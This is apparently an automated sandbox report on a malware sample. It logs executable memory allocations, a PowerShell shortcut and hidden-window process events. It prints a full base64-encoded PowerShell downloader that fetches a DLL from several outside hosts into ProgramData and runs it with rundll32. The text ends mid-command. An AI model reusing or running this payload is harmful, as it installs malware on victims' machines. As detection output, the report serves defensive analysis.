NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"

cmdline

powershell -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 15, 2023, 9:57 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAO